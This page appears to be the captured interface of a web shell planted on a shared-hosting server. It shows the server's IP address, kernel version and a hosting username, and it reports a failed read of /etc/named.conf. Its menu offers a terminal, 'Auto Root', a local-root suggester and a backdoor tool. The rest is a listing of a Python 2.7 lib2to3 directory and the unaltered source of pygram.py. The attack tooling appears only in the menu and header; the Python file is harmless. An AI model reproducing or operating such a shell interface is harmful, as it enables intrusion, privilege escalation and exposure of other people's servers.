Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.138.191.28
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib64 /
python2.7 /
lib2to3 /
Delete
Unzip
Name
Size
Permission
Date
Action
fixes
[ DIR ]
drwxr-xr-x
2024-06-13 10:37
pgen2
[ DIR ]
drwxr-xr-x
2024-06-13 10:37
Grammar.txt
6.93
KB
-rw-r--r--
2024-04-10 04:58
Grammar2.7.18.final.0.pickle
39.54
KB
-rw-r--r--
2024-04-10 04:58
PatternGrammar.txt
793
B
-rw-r--r--
2024-04-10 04:58
PatternGrammar2.7.18.final.0.pickle
2.73
KB
-rw-r--r--
2024-04-10 04:58
__init__.py
7
B
-rw-r--r--
2024-04-10 04:58
__init__.pyc
127
B
-rw-r--r--
2024-04-10 04:58
__init__.pyo
127
B
-rw-r--r--
2024-04-10 04:58
__main__.py
67
B
-rw-r--r--
2024-04-10 04:58
__main__.pyc
242
B
-rw-r--r--
2024-04-10 04:58
__main__.pyo
242
B
-rw-r--r--
2024-04-10 04:58
btm_matcher.py
6.67
KB
-rw-r--r--
2024-04-10 04:58
btm_matcher.pyc
5.69
KB
-rw-r--r--
2024-04-10 04:58
btm_matcher.pyo
5.69
KB
-rw-r--r--
2024-04-10 04:58
btm_utils.py
9.78
KB
-rw-r--r--
2024-04-10 04:58
btm_utils.pyc
7.39
KB
-rw-r--r--
2024-04-10 04:58
btm_utils.pyo
7.39
KB
-rw-r--r--
2024-04-10 04:58
fixer_base.py
6.62
KB
-rw-r--r--
2024-04-10 04:58
fixer_base.pyc
7.02
KB
-rw-r--r--
2024-04-10 04:58
fixer_base.pyo
7.02
KB
-rw-r--r--
2024-04-10 04:58
fixer_util.py
14.25
KB
-rw-r--r--
2024-04-10 04:58
fixer_util.pyc
14.34
KB
-rw-r--r--
2024-04-10 04:58
fixer_util.pyo
14.34
KB
-rw-r--r--
2024-04-10 04:58
main.py
11.33
KB
-rw-r--r--
2024-04-10 04:58
main.pyc
9.6
KB
-rw-r--r--
2024-04-10 04:58
main.pyo
9.56
KB
-rw-r--r--
2024-04-10 04:58
patcomp.py
6.9
KB
-rw-r--r--
2024-04-10 04:58
patcomp.pyc
6.45
KB
-rw-r--r--
2024-04-10 04:58
patcomp.pyo
6.14
KB
-rw-r--r--
2024-04-10 04:58
pygram.py
1.13
KB
-rw-r--r--
2024-04-10 04:58
pygram.pyc
1.41
KB
-rw-r--r--
2024-04-10 04:58
pygram.pyo
1.41
KB
-rw-r--r--
2024-04-10 04:58
pytree.py
28.36
KB
-rw-r--r--
2024-04-10 04:58
pytree.pyc
29.59
KB
-rw-r--r--
2024-04-10 04:58
pytree.pyo
28.73
KB
-rw-r--r--
2024-04-10 04:58
refactor.py
27.37
KB
-rw-r--r--
2024-04-10 04:58
refactor.pyc
23.35
KB
-rw-r--r--
2024-04-10 04:58
refactor.pyo
23.31
KB
-rw-r--r--
2024-04-10 04:58
Save
Rename
# Copyright 2006 Google, Inc. All Rights Reserved. # Licensed to PSF under a Contributor Agreement. """Export the Python grammar and symbols.""" # Python imports import os # Local imports from .pgen2 import token from .pgen2 import driver from . import pytree # The grammar file _GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt") _PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "PatternGrammar.txt") class Symbols(object): def __init__(self, grammar): """Initializer. Creates an attribute for each grammar symbol (nonterminal), whose value is the symbol's type (an int >= 256). """ for name, symbol in grammar.symbol2number.iteritems(): setattr(self, name, symbol) python_grammar = driver.load_packaged_grammar("lib2to3", _GRAMMAR_FILE) python_symbols = Symbols(python_grammar) python_grammar_no_print_statement = python_grammar.copy() del python_grammar_no_print_statement.keywords["print"] pattern_grammar = driver.load_packaged_grammar("lib2to3", _PATTERN_GRAMMAR_FILE) pattern_symbols = Symbols(pattern_grammar)